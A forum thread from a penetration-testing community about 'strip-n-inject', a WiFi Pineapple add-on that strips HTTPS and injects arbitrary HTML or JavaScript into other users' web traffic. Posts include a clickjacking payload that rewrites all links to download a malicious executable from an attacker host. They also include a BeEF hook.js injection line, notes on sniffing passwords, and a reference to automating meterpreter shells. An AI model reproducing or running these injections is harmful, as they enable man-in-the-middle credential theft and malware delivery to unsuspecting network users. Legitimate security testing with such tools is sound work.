leg3nd Posted October 25, 2013 Share Posted October 25, 2013 (edited) Description: This infusion will inject HTML code into a response from a server. The issue with ettercap and other proxies is that they cannot inject into SSL sessions as a result of the encryption. This infusion takes Moxie's SSLstrip and uses that as the proxy that injects code. This architecture provides 2 main benefits: Strip SSL from sessions before injecting code which allows for a larger attack surface. An asynchronous, non-blocking socket proxy provided by twisted-web gives much better performance from the client's point of view. The attacks that can be implemented from this are endless.. SSLstrip for stealing passwords and inject BeEf hook.. or Java Applets... or Browser_AutoPwn in an Iframe.. All these and more will be possible via JasagerPwn or manually. Feature Set: Installer - The installer will setup the SSLStrip dependencies. This will probably even fix your normal sslstrip infusion if you're having issues with it.Note: This does not use the default SSLStrip on the system since SSLStrip had to be modified for this purpose. Log Output - Displays the log standard output that is generated by the modified SSLStrip. Yes.. you can get passwords still in here in the process. Attacker (single address) filter - Pretty self explanitory, this adds a '! -s attacker_ip' in the iptables rule so you do not inject code into your own browsing sessions. Injection Code Editor - Allows you to enter in any arbitrary code into the text editor. Note, if you have an attack running and modify this code - you need to restart the attack. Auto Refresh Enable/Disable and Logging in Small Tile Screenshot (Interface): Screenshot (Basic Alert Pop-up): Credit: Infusion GUI: Whistle Master SSLStrip: Moxie Marlinspike Cheers! Edited October 25, 2013 by leg3nd Quote Link to comment Share on other sites More sharing options...
levisiccard Posted October 25, 2013 Share Posted October 25, 2013 Got it installed! Grabbing a pizza out of the oven and will check it out tonight Hope it fixes ssl strip also, would be cool. cheers! Quote Link to comment Share on other sites More sharing options...
leg3nd Posted October 25, 2013 Author Share Posted October 25, 2013 Cool, please report any bugs so I can get em fixed up. This is my advice with the SSLstrip issues: If SSLStrip is already working for you: don't press install because it will "just work" regardless if its "not installed" If SSLstrip is not working: The "Install" will likely fix it based on previous forum posts of SSLstrip installtions This is basically the install script if you feel like trying it manually: opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/ fi if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/ fi Quote Link to comment Share on other sites More sharing options...
levisiccard Posted October 25, 2013 Share Posted October 25, 2013 SSH for the sslstrip issues?? Further your infusion is working fine. also password sniffing for tcp-http. Can I just sniff passwords with it without sending the messages? greetz! Quote Link to comment Share on other sites More sharing options...
leg3nd Posted October 25, 2013 Author Share Posted October 25, 2013 If it doesn't "just work", which it should with the install button, then you might need to SSH to debug it. I'm sure you can theoretically do that but going into the "Injection Code" tab, removing all code, and saving it. This infusion is really not meant for sniffing passwords though - it lacks filters, log saving, less verbose output, etc. This infusion is meant for injecting code for more advanced attack vectors. If you have this infusion working, you should be able to sniff passwords with the normal "sslstrip" infusion as they use the same dependencies. Quote Link to comment Share on other sites More sharing options...
levisiccard Posted October 25, 2013 Share Posted October 25, 2013 hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue. anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-) I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment its all networking and windows server at school, wich is also taking a lot of time now... Got to make choices man but love your infusion ;-) Quote Link to comment Share on other sites More sharing options...
chriswhat Posted October 25, 2013 Share Posted October 25, 2013 (edited) Just wanted to say thanks. Prior to installing your infusion, SSLStrip was broken. In addition to the fun HTML injection, your infusion posts creds. Good work. Add logging and I won't have a use for the SSLStrip infusion. Edited October 25, 2013 by chriswhat Quote Link to comment Share on other sites More sharing options...
leg3nd Posted October 25, 2013 Author Share Posted October 25, 2013 hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue. anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-) I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment its all networking and windows server at school, wich is also taking a lot of time now... Got to make choices man but love your infusion ;-) The great thing is that you dont need to know programing to mount these attacks. Thats what this script is for: https://forums.hak5.org/index.php?showtopic=30588 It will automate many advanced attack vectors that utilize code injection for you - generally with the purpose of returning a meterpreter shell. Add logging and I won't have a use for the SSLStrip infusion. I guess I could add logging/filtering to this... but that wasn't the original purpose of the infusion. If the SSLstrip module doesn't get updated then I'll just grab that logic and add it to this so it can be used for both sniffing and code injection. Quote Link to comment Share on other sites More sharing options...
levisiccard Posted October 26, 2013 Share Posted October 26, 2013 hey, what is the new update from today about with the following new injection code? <meta http-equiv="cache-control"content="no-cache"><meta http-equiv="X-UA-Compatible"content="IE=9"><script src="http://code.jquery.com/jquery-1.9.1.min.js" ></script><script>$(document).ready(function(){var div=document.createElement("div");div.id="overlayclick";div.style.zIndex="100";div.style.width="100%";div.style.height="100%";div.style.position="fixed";div.onclick=function(){window.open("http://172.16.42.160/run.php")};if(document.body.firstChild)document.body.insertBefore(div,document.body.firstChild);else document.body.appendChild(div)});</script><script>$(document).ready(function(){$("a").attr("href","http://172.16.42.160/run.php")});</script> regards! Quote Link to comment Share on other sites More sharing options...
leg3nd Posted October 26, 2013 Author Share Posted October 26, 2013 Whoops - that's the code from the ClickJacking attack that's implemented in JasagerPwn. It basically will replace all links on the page with a download to a malicous executable as a user browses. The main purpose I made this infusion was for the attack vectors I have in JasagerPwn. The update mainly added some failsafe code to ensure the iptables commands are removed correctly and added additional verbosity to the log output. Feel free to replace it with: <script>window.alert("Pineapple!")</script> for the simple popup window. Quote Link to comment Share on other sites More sharing options...
xtr4nge Posted October 27, 2013 Share Posted October 27, 2013 Hi leg3nd, good job. Take a look to this repo: https://github.com/xtr4nge/sslstrip Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork. Options: -t <config>, --tamper <config> Enable response tampering with settings from <config>. -i , --inject Inject code into HTML pages using a text file (default inject.txt) For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name. Also you can implement more advanced attacks using the -t option. I'm adding these functionalities to my project this week. regards, Quote Link to comment Share on other sites More sharing options...
leg3nd Posted October 27, 2013 Author Share Posted October 27, 2013 (edited) Hi leg3nd, good job. Take a look to this repo: https://github.com/xtr4nge/sslstrip Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork. Options: -t <config>, --tamper <config> Enable response tampering with settings from <config>. -i , --inject Inject code into HTML pages using a text file (default inject.txt) For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name. Also you can implement more advanced attacks using the -t option. I'm adding these functionalities to my project this week. regards, Very cool. Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks. Thanks! Edited October 27, 2013 by leg3nd Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted October 28, 2013 Share Posted October 28, 2013 Nice idea on the infusion, but don't you think that you should have a go at making your own UI? It just seems like all the infusions look the same, not just yours but most :) Quote Link to comment Share on other sites More sharing options...
leg3nd Posted October 28, 2013 Author Share Posted October 28, 2013 Naw not anytime soon.. I can hack things together but don't care to spend my time doing web development. Standardization is a good thing imo. No point in reinventing the wheel. I guess if there became a need I might do it.. but im not much of a GUI fan to begin with.. I barley use it in my pentests to begin with. Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted October 28, 2013 Share Posted October 28, 2013 Personally, I like those infusions' UI :P @Foxtro: Most of the infusions have the same UI as they are developed by the same person... Should I understand that you don't like my UIs ;) ? Quote Link to comment Share on other sites More sharing options...
Foxtrot Posted October 28, 2013 Share Posted October 28, 2013 Not at all, im just starting to think you have an Alter-ego ;) Quote Link to comment Share on other sites More sharing options...
xtr4nge Posted November 2, 2013 Share Posted November 2, 2013 (edited) Very cool. Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks. Thanks! Hi leg3nd Here you have a few screenshots of my SSLStrip fork implemented. https://github.com/xtr4nge/FruityWifi/wiki/Tutorial-(SSLStrip) regards, Edited November 2, 2013 by xtr4nge Quote Link to comment Share on other sites More sharing options...
secret4all Posted November 5, 2013 Share Posted November 5, 2013 (edited) I bought Mark IV month ago. How can I install on Mark IV? Edited November 5, 2013 by secret4all Quote Link to comment Share on other sites More sharing options...
WallE Posted January 27, 2014 Share Posted January 27, 2014 Is this new script bypass HSTS protection? Quote Link to comment Share on other sites More sharing options...
leg3nd Posted March 18, 2014 Author Share Posted March 18, 2014 Is this new script bypass HSTS protection? It was not designed with that in mind. I can look into the possibility of bypassing it if that is of interest to you. Quote Link to comment Share on other sites More sharing options...
numericaldigitaldroned Posted April 26, 2014 Share Posted April 26, 2014 quick newbie question.... I have the "strip-n-inject" infusion installed to my SDcard as well as the "SSL Strip" infusion installed too.... I've been trying to run them both but it has occurred to me that perhaps it should be one or the other. Thanks in advance to anyone who can clear that up for me. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted April 27, 2014 Share Posted April 27, 2014 I notice there's a lot to talk about SSLStrip. just for example the droid application for facebook, has anyone had success on preventing ssl on droid applications? Quote Link to comment Share on other sites More sharing options...
fanbase Posted May 10, 2014 Share Posted May 10, 2014 It can be both, simultaneously. In fact, this is one of the configurations that the jasagerPwn script sets up for you, with impressive effects. Quote Link to comment Share on other sites More sharing options...
leg3nd Posted May 10, 2014 Author Share Posted May 10, 2014 I notice there's a lot to talk about SSLStrip. just for example the droid application for facebook, has anyone had success on preventing ssl on droid applications? It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work. However most application development teams, especially the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake of thing that Secure Development Life Cycles look to prevent. Quote Link to comment Share on other sites More sharing options...
toan3000 Posted May 18, 2014 Share Posted May 18, 2014 It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work. However most application development teams, especially the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake of thing that Secure Development Life Cycles look to prevent. Hi @leg3nd, i tried your infusion many time but never success inject hook.js in traffic thought my Pineapple. I config my Pineapple work as "client mode", my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running beef server. I ssh to pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/". Everything seen ok, but when i test suff web througt pineapple, the html page not be injected, i check the source code of html respone and it not have hook.js. I don't know what's wrong? You can help me? Thanks alot! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.